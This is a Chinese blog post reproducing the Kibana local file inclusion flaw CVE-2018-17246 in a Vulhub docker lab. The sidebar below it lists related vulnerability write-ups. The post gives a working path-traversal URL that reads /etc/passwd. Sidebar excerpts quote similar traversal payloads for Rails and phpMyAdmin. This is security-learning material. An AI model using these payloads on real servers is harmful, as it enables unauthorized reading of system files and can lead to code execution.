Kibana Local File Inclusion (CVE-2018-17246)

最新推荐文章于 2021-07-23 16:59:00 发布
最新推荐文章于 2021-07-23 16:59:00 发布
阅读量533 收藏
点赞数
分类专栏: 中间件漏洞复现 文章标签: kibana 安全漏洞 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy15667076526/article/details/111414619
版权
该博客详细介绍了Kibana 5.6.13到6.4.3版本之间存在的文件包含漏洞,攻击者可以通过此漏洞读取服务器上的任意文件。复现过程包括使用Vulhub的5.6.12版本,通过docker-compose启动环境,然后访问特定URL触发漏洞,展示如何查看/etc/passwd文件。博客还提供了相关docker-compose命令以便操作。
摘要由CSDN通过智能技术生成

声明

好好学习,天天向上

漏洞描述

Kibana 为 Elassticsearch 设计的一款开源的视图工具。其5.6.13到6.4.3之间的版本存在一处文件包含漏洞,通过这个漏洞攻击者可以包含任意服务器上的文件。此时,如果攻击者可以上传一个文件到服务器任意位置,即可执行代码。

影响范围

6.4.3之前版本

5.6.13之前

复现过程

这里使用5.6.12版本

使用vulhub

/app/vulhub-master/kibana/CVE-2018-17246

使用docker启动

docker-compose build
docker-compose up -d

环境启动后,访问

http://192.168.239.129:5601

访问

http://192.168.239.129:5601/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd

虽然在返回的数据包里只能查看到一个500的错误信息,但是我们通过执行docker-compose logs即可发现,/etc/passwd已经成功被包含:

在这里插入图片描述

关闭镜像(每次用完后关闭)

docker-compose down

docker-compose常用命令

拉镜像(进入到vulhub某个具体目录后)

docker-compose build
docker-compose up -d

镜像查询(查到的第一列就是ID值)

docker ps -a

进入指定镜像里面(根据上一条查出的ID进入)

docker exec -it ID /bin/bash

关闭镜像(每次用完后关闭)

docker-compose down
维梓-
关注
专栏目录
phpmyadmin scripts/setup.php 反序列化漏洞
千寻的博客
03-21 1782
序列化 (serialize)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。【将状态信息保存为字符串简单的理解:将PHP中 对象、类、数组、变量、匿名函数等,转化为字符串,方便保存到数据库或者文件中,当在php中创建了一个对象后,可以通过把这个对象转变成一个字符串,保存对象的值方便之后的传递与使用。序列化就是将对象的状态信息转为字符串储存起来那么反序列化就是再将这个。
Kibana本地文件包含漏洞(CVE-2018-17246)复现
玄道的网安博客
03-09 2449
漏洞概述 Kibana 为 Elassticsearch 设计的一款开源的视图工具。其5.6.13到6.4.3之间的版本存在一处文件包含漏洞,通过这个漏洞攻击者可以包含任意服务器上的文件。此时,如果攻击者可以上传一个文件到服务器任意位置,即可执行代码。 影响版本 ElasticSearch Kibana < 6.4.3 ElasticSearch Kibana < 5.6.13 环境搭建 这里使用docker进行安装 https://github.c...
Ruby on Rails 路径穿越与任意文件读取漏洞(CVE-2019-5418)
黑白的博客
12-14 345
声明 好好学习,天天向上 漏洞描述 在控制器中通过render file形式来渲染应用之外的视图,且会根据用户传入的Accept头来确定文件具体位置。 通过传入Accept: …/…/…/…/…/…/…/…/etc/passwd{{ 头来构成构造路径穿越漏洞,读取任意文件。 影响范围 Rails全版本 其中修复版本 6.0.0.beta3, 5.2.2.1 5.1.6.2 5.0.7.2 4.2.11.1 复现过程 这里使用2.5.4版本 使用vulhub cd /app/vulhub-master/rai
Phpmyadmin Scripts / setup.php反序列化漏洞 WooYun-2016-199433 漏洞复现
ADummy的博客
02-27 466
Phpmyadmin Scripts / setup.php反序列化漏洞(WooYun-2016-199433) by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>有回显读取文件 0x01漏洞介绍 phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码 影响版本 phpmyadmin 2.x 0x02漏洞复现 payload POST /scripts/setup.php HTTP/1.1 Host: your-ip:808
phpmyadmin scripts/setup.php 反序列化漏洞(WooYun-2016-199433)
EC_Carrot的博客
07-20 258
漏洞简介 phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。 这个漏洞无需链接数据库,与数据库无关。 漏洞复现 发送如下数据包,即可读取/etc/passwd: POST /scripts/setup.php HTTP/1.1 Host: your-ip:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compati
phpMyadmin /scripts/setup.php Remote Code Injection && Execution CVE-2009-1151
weixin_33894992的博客
10-22 581
目录 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考   1. 漏洞描述 Insufficient output sanitizing when generating configuration file phpMyAdmin是用PHP编写的工具,用于通过WEB管理MySQL phpMyAdmin的Setup脚本...
最新版linux kibana-8.10.2-linux-x86-64.tar.gz
最新发布
09-23
最新版linux kibana-8.10.2-linux-x86_64.tar.gz最新版linux kibana-8.10.2-linux-x86_64.tar.gz最新版linux kibana-8.10.2-linux-x86_64.tar.gz最新版linux kibana-8.10.2-linux-x86_64.tar.gz最新版linux kibana-...
最新版windows kibana-8.8.0-windows-x86-64.zip
05-29
最新版windows kibana-8.8.0-windows-x86_64.zip最新版windows kibana-8.8.0-windows-x86_64.zip最新版windows kibana-8.8.0-windows-x86_64.zip
kibana-6.2.2-linux-x86_64.tar.gz.zip
08-18
标题"Kibana-6.2.2-linux-x86_64.tar.gz.zip"表明我们正在处理的是6.2.2版本的Kibana,适用于Linux(x86_64架构)的压缩包,该压缩包采用了双重压缩,即首先是一个tar归档文件,然后是zip压缩。首先,你需要将文件...
最新版linux kibana-7.17.6-linux-x86_64.tar.gz
09-02
在64位Linux系统上运行的kibana-7.17.6-linux-x86_64.tar.gz压缩包包含了所有必要的文件和资源,以支持用户安装和运行Kibana。 首先,我们来深入了解Kibana的核心功能。Kibana提供了一个直观的Web界面,允许用户...
Elasticsearch 核心插件Kibana 本地文件包含漏洞分析(CVE-2018-17246
weixin_33726318的博客
01-02 536
不久前Elasticsearch发布了最新安全公告, Elasticsearch Kibana 6.4.3之前版本和5.6.13之前版本中的Console插件存在严重的本地文件包含漏洞可导致拒绝服务攻击、任意文件读取攻击、配合第三方应用反弹SHELL攻击,下文笔者对其漏洞背景、攻击原理和行为进行分析和复现。 0X01 影响范围 Elasticsearch Kibana是荷兰Elasticsea...
phpMyadmin /scripts/setup.php Execute Arbitrary PHP Code Via A Crafted POST Request CVE-2010-3055
weixin_30820151的博客
01-20 199
目录 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述 The configuration setup script (aka scripts/setup.php) in phpMyAdmin 2.11.x before 2.11.10.1 does not properly restrict ...
[Vulhub](WooYun-2016-199433)phpmyadmin反序列化漏洞
weixin_45605352的博客
04-25 881
0x01 预备知识 什么是序列化 序列化 (serialize)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。【将状态信息保存为字符串】 简单的理解:将PHP中 对象、类、数组、变量、匿名函数等,转化为字符串,方便保存到数据库或者文件中 当在php中创建了一个对象后,可以通过serialize()把这个对象转变成一个字符串,保存对象的值方便之后的传递与使用。 什么是反序列化
Rails存在安全问题:数月前发现的漏洞正被利用
测试
06-01 159
Ruby-On-Rails网站的用户和管理员发现他们正面临着恶意软件的攻击,该攻击利用了今年1月公布的一项Ruby安全漏洞。该漏洞一旦被利用,未打补丁的系统会直接从远程计算机上下载特定代码,编译一份IRC客户端,然后加入特定频道并等待下一步指令。松懈的安全策略暴露了出来,与此同时,这些攻击也尖锐地提醒了我们迅速部署补丁的重要性。\原始的漏洞是通过CVE-2013-0156宣布的,它位于Ruby o...
phpmyadmin scripts/setup.php 反序列化漏洞攻击实验
每天累计一滴水 十天后变成一大滴水 一百天后变成一杯水
10-07 958
msf攻击phpmyadmin 4.0x - 4.6.2 远程代码执行漏洞。 Phpmyadmin Scripts/setup.php Deserialization Vulnerability (WooYun-2016-199433) deserialization n 反序列化,还原序列化 目标(被攻击)计算机搭建漏洞环境: 攻击计算机启用漏洞攻击模块: 目标(被攻击)计算机退出漏洞环境: 攻击计算机退出漏洞攻击环境: ...
Kibana本地文件包含漏洞(CVE-2018-17246
大方子
07-23 5144
影响版本 ElasticSearch Kibana < 6.4.3 ElasticSearch Kibana < 5.6.13 搭建过程 cd vulhub-master/kibana/CVE-2018-17246 docker-compose up -d 验证POC http://your-ip:5601/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../
Ruby On Rails 路径穿越漏洞(CVE-2018-3760)
Yale的博客
03-19 3099
Ruby On Rails 路径穿越漏洞(CVE-2018-3760) 前言: 这个漏洞作为路径穿越的典型例子,比较经典,18年跟着文档分析了一遍,最近又重新理了一遍,捎带着写了一遍源码跟踪分析的过程,个人感觉整个跟入调用的思想还是比较清晰的,分析的过程写的比较详细,有兴趣的萌新们也可以跟着分析一遍。 背景: Sprockets中存在信息泄露漏洞。 受影响的版本:4.0.0.beta7及更低版本,...
kibana-7.4.0-windows-x86_64.zip
05-12
kibana-7.4.0-windows-x86_64.zip是什么? kibana-7.4.0-windows-x86_64.zip是一个数据可视化工具,用于与Elasticsearch进行交互并创建实时图表和可视化。该工具提供了用于从大量数据中展示数据集合的各种图表和可视化方式,通过它可以查看、分析和探索数据,从而发现趋势、关系和问题。 该压缩包是Kibana的Windows版,适用于64位Windows操作系统。这意味着用户在使用此安装包时需要使用支持64位操作系统的计算机。同时,该安装包还包含Kibana的所有核心组件,并在Windows操作系统下提供了使用Kibana的便捷方式。 总而言之,如果您正在寻找一种高效的方法来通过各种数据可视化技术处理和分析大量数据集合,那么Kibana-7.4.0-windows-x86_64.zip是您的最佳选择。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值